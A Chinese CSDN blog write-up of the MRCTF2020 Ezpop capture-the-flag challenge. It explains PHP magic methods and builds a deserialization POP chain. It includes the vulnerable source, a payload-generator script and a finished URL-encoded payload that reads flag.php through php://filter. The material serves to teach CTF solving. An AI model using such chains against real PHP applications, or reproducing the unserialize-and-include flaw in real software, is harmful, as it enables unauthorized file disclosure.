[MRCTF2020]Ezpop(详解)

最新推荐文章于 2024-07-09 23:47:49 发布
最新推荐文章于 2024-07-09 23:47:49 发布
阅读量2.3k 收藏 16
点赞数 11
分类专栏: buuctf 文章标签: php web安全 序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pakho_C/article/details/126057111
版权

[MRCTF2020]Ezpop

<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

php代码审计
知识点:
1.__invoke()
当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。
eg:

<?php
class Person
{
    public $sex;
    public $name;
    public $age;
    public function __construct($name="",  $age=25, $sex='男')
    {
        $this->name = $name;
        $this->age  = $age;
        $this->sex  = $sex;
    }
    public function __invoke() {
        echo '这可是一个对象哦';
    }
}
$person = new Person('小明'); // 初始赋值
$person();

输出:这可是一个对象哦
2.__toString()
作用:
__toString() 方法用于一个类被当成字符串时应怎样回应。例如 echo $obj; 应该显示些什么。
eg:

<?php
class Person
{
public $sex;
public $name;
public $age;
public function __construct($name="", $age=25, $sex='男')
{
$this->name = $name;
$this->age = $age;
$this->sex = $sex;
}
public function __toString()
{
return 'go go go';
}
}
$person = new Person('小明'); // 初始赋值
echo $person;

结果:go go go
3. __get()
当我们试图获取一个不可达属性时(比如private),类会自动调用__get函数
eg:

class Person
{
    private $name;
    ...
}
$person3 = new Person();
echo $person3->$name;//这个时候__get()函数自动调用,然后输出$name中的值

解题:
题目对pop参数进行反序列化操作,那么需要构造序列化后的pop参数

当pop参数为Show类时,反序列化时会先调用__wakeup()函数,进行过滤

public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }

此时pop为show类的一个对象,包含2个参数:source和str,由于构造函数__construct有echo $this->source,要触发__toString()函数,则可以将source参数作为一个类的对象

public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }

public function __toString(){
        return $this->str->source;
    }

将pop对象的参数source作为Show类的对象(此时source对象也有两个参数:source和str),则会执行__toString()函数,return source对象的str参数的source,此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数

public function __get($key){
        $function = $this->p;
        return $function();
    }

__get()函数调用p参数对应的函数 注意:$function()
如果$function是个对象,那么则会调用__invoke()函数

public function __invoke(){
        $this->append($this->var);
    }

所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数

public function append($value){
        include($value);
    }

所以可以将var参数设置为php://filter/read=convert.base64-encode/resource=flag.php用来读取flag

整体流程:
在这里插入图片描述

构造payload:

<?php
class Modifier {
	protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";
 
} 
class Test{
    public $p;
	
} 
class Show{
    public $source;
    public $str;
    
} 
$pop = new Show();
$pop->source = new Show();
$pop->source->str = new Test();
$pop->source->str->p = new Modifier();
echo urlencode(serialize($pop));
?>

在这里插入图片描述
需要urlencode的原因参考了另一位师傅的话:

最后的序列化结果进行url编码的原因我认为是这样的:如果不进行编码,最后输出的结果是片段的,不是全部的,会有类似截断导致结果异常,所以需要进行url编码

得到最终payload:

pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

在这里插入图片描述
在这里插入图片描述

pakho_C
关注
  • 11
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
【buuctf】MRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 968
真的很详细
[MRCTF2020]Ezpop 1(代码审计)
weixin_45577185的博客
10-13 316
太绕了,wuwuwu~ Welcome to index.php <?php //flag is in flag.php //提示:flag在flag.php文件内,猜测是当前网站根目录下的flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 /
buuctf-[MRCTF2020]Ezpop)(小宇特详解
小宇的web博客
04-04 3086
buuctf-[MRCTF2020]Ezpop(小宇特详解) 1.先查看题目,题目是eazypop,说明这道题是让构造简单的pop链 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%9
[MRCTF2020]Ezpop解析
06-30 259
魔法函数:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。创建类对象时自动调用 当使用 new 操作符创建一个类的实例时,构造方法将会自动调用__toString() 会在需要转成字符串时, 会隐式自动调用它, 在PHP内部. 这个也是来自JAVA的当一个对象被当作一个字符串被调用。使用unserialize时触发__get() 用于从不可访问的属性读取数据 #难以访问包括:(1)私有属性,(2)没有初始化的属性。
[MRCTF2020]Ezpop
Sk1y的博客
05-04 1051
考查点:php序列化
[MRCTF2020]vigenere
2er0!=O的博客
05-29 1741
[MRCTF2020]vigenere cipher.txt g vjganxsymda ux ylt vtvjttajwsgt bl udfteyhfgt oe btlc ckjwc qnxdta vbbwwrbrtlx su gnw nrshylwmpy cgwps, lum bipee ynecgy gk jaryz frs fzwjp, x puej jgbs udfteyhfgt, gnw sil uuej su zofi. sc okzfpu bl lmi uhzmwi, x nyc dsj
iptables 详解iptables 详解
12-02
iptables 详解
QValueAxis详解
04-06
QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解QValueAxis详解...
IntelliJ IDEA 2020下载与安装教程图文详解
08-19
主要介绍了IDEA 2020下载与安装的教程,本文通过图文并茂的形式给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
DCS控制系统详解
11-25
DCS控制系统详解,DCS控制系统详解课件,DCS控制系统详解PPT
2020年系统分析师试题及答案详解【整理版本】
03-17
《2020年系统分析师试题及答案详解》是一份针对系统分析师考试的重要参考资料,它详尽解析了2020年度系统分析师考试的真实题目及其答案。这份资料旨在帮助备考者深入理解考试内容,掌握核心知识点,提升分析与解决...
BUUCTF [MRCTF2020]Ezpop 详解
lzu_lfl的博客
11-09 608
pop链
MRCTF2020」- Ezpop
ro4lsc的博客
05-14 2475
MRCTF2020」- Ezpop 做了一个星期的反序列化,不知道为啥,概念从模糊到清晰再到模糊,看来还是基础不扎实导致的,所以就有了这一篇文章的诞生,思路的一个整理以及POP链的构造需要再熟悉熟悉 俗话说的好,有ez的题目都不ez,那么这个题同样也不ez 重新复习一下php里面反序列化序列化的几大魔术方法 __destruct(类执行完毕以后调用,其最主要的作用是拿来做垃圾回收机制。) __construct(类一执行就开始调用,其作用是拿来初始化一些值。) __toString(在对象当做字符串的
国赛ezpop题目复现(tp6)
m0_62422842的博客
07-21 642
顺着这个题目,也抛砖引玉一下,对thinkphp6.0.12框架的反序列化链进行了一个分析。
什么是RPC?有哪些RPC框架?
最新发布
yuiezt的专栏
07-09 1847
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。
IEC 60617-2020-DATABASE SNAPSHOT Graphical symbols for diagrams
04-23
IEC 60617-DB-2020-DATABASE SNAPSHOT Graphical symbols for diagrams

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值